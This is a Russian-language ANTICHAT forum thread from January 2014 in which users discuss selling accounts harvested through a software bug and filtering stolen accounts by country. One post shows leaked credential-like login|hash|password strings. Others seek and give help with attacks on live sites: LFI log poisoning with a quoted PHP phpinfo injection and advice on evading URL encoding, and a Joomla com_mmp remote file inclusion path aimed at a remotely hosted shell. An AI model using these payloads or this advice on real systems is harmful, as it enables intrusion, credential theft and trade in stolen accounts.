HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.01.2014, 01:56
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

Цитата:
Сообщение от websheff  
получается все селлеры барижат одними и теми же акками? Или на каждого 50-100к акков?
Кто сколько успеет собрать, всем хакерам которые имеют эту багу распределены время сбора, акки бывают и свежие и старореги!11
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #2  
Старый 11.01.2014, 02:01
websheff
Новичок
Регистрация: 28.10.2012
Сообщений: 3
С нами: 7126166

Репутация: 0
По умолчанию

Цитата:
Сообщение от shell_c0de  
Кто сколько успеет собрать, всем хакерам которые имеют эту багу распределены время сбора, акки бывают и свежие и старореги!11
Да, это заметил что микс. А как по странам фильтруют то?

Хм и где можно найти этих хакеров/приобрести долю/мониторить сосстояние бага?
 
Ответить с цитированием

  #3  
Старый 11.01.2014, 02:07
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от websheff  
Да, это заметил что микс. А как по странам фильтруют то?
Хм и где можно найти этих хакеров/приобрести долю/мониторить сосстояние бага?
При доступу к БД сайта можно выводить аккаунты по странам и кол-во фолловеров. Стукни продавцам акков, они может продадут или посоветуют у кого купить.
 
Ответить с цитированием

  #4  
Старый 11.01.2014, 02:18
websheff
Новичок
Регистрация: 28.10.2012
Сообщений: 3
С нами: 7126166

Репутация: 0
По умолчанию

Цитата:
Сообщение от kingbeef  
При доступу к БД сайта можно выводить аккаунты по странам и кол-во фолловеров. Стукни продавцам акков, они может продадут или посоветуют у кого купить.
Спасибо, попробую. Сомневаюсь что поделятся хлебушком, но рискнем
 
Ответить с цитированием

  #5  
Старый 11.01.2014, 21:18
zombak18
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами: 7690646

Репутация: 0
По умолчанию

Загадка небольшая

Есть 3 сайта 1 человека.. на них стоят игровые сервера(ну сайты для регистрации, изменения пароля и т.п..клиентские игры..причем разные) есть файл login.aspx(но он не для входа.. вроде бы)

В одном из них

test10a|9cbea4ebc53dfb893f124932246b60ec|12341234

В других 1|test10a|120971264|

Может быть кто-то знает для чего это вообще нужно?(
 
Ответить с цитированием

  #6  
Старый 11.01.2014, 21:41
Dexec
Новичок
Регистрация: 10.02.2013
Сообщений: 12
С нами: 6974966

Репутация: 0
По умолчанию

ребят помогите плз нашел LFI нашел error_log , обратился к сайту site.com/dir/file.css делаю инклуд лога но в самом логе записывается вот так ss/icon.css%3C?php%20phpinfo();%20?%3E.

как побороть эту кодировку ? ( чтоб нормально записывало ?
 
Ответить с цитированием

  #7  
Старый 11.01.2014, 21:51
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию

Цитата:
Сообщение от zombak18  
Загадка небольшая
Есть 3 сайта 1 человека.. на них стоят игровые сервера(ну сайты для регистрации, изменения пароля и т.п..клиентские игры..причем разные) есть файл login.aspx(но он не для входа.. вроде бы)
В одном из них
test10a|9cbea4ebc53dfb893f124932246b60ec|12341234
В других 1|test10a|120971264|
Может быть кто-то знает для чего это вообще нужно?(
похоже на логины и пароли

Цитата:
Сообщение от Dexec  
ребят помогите плз нашел LFI нашел error_log , обратился к сайту site.com/dir/file.css делаю инклуд лога но в самом логе записывается вот так ss/icon.css%3C?php%20phpinfo();%20?%3E.
как побороть эту кодировку ? ( чтоб нормально записывало ?
это твой фаерфокс урл кодирует, открой через другой браузер
 
Ответить с цитированием

  #8  
Старый 12.01.2014, 00:46
zombak18
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами: 7690646

Репутация: 0
По умолчанию

Цитата:
Сообщение от qaz  
похоже на логины и пароли
Ясенпень похоже.. но не могу понять для чего и куда.. Не для сайта точно
 
Ответить с цитированием

  #9  
Старый 12.01.2014, 02:23
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от zombak18  
Ясенпень похоже.. но не могу понять для чего и куда.. Не для сайта точно
Тебе сюда

http://vanga.ru/forum/
 
Ответить с цитированием

  #10  
Старый 12.01.2014, 10:04
mazaxaka
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
С нами: 9597253

Репутация: 82
По умолчанию

в общем детский вопрос по рфи

пример рфи в джумле

Цитата:
Сообщение от None  
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell
как должен выглядеть путь к шелу?

Цитата:
Сообщение от None  
http://site.ru/shell.txt
http://site.ru/shell.txt?
http://site.ru/shell.php
http://site.ru/shell.php?
http://site.ru/shell.txt%00
http://site.ru/shell.php%00
mosConfig_absolute_path так и должно быть или там нужно что то другое вписывать?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.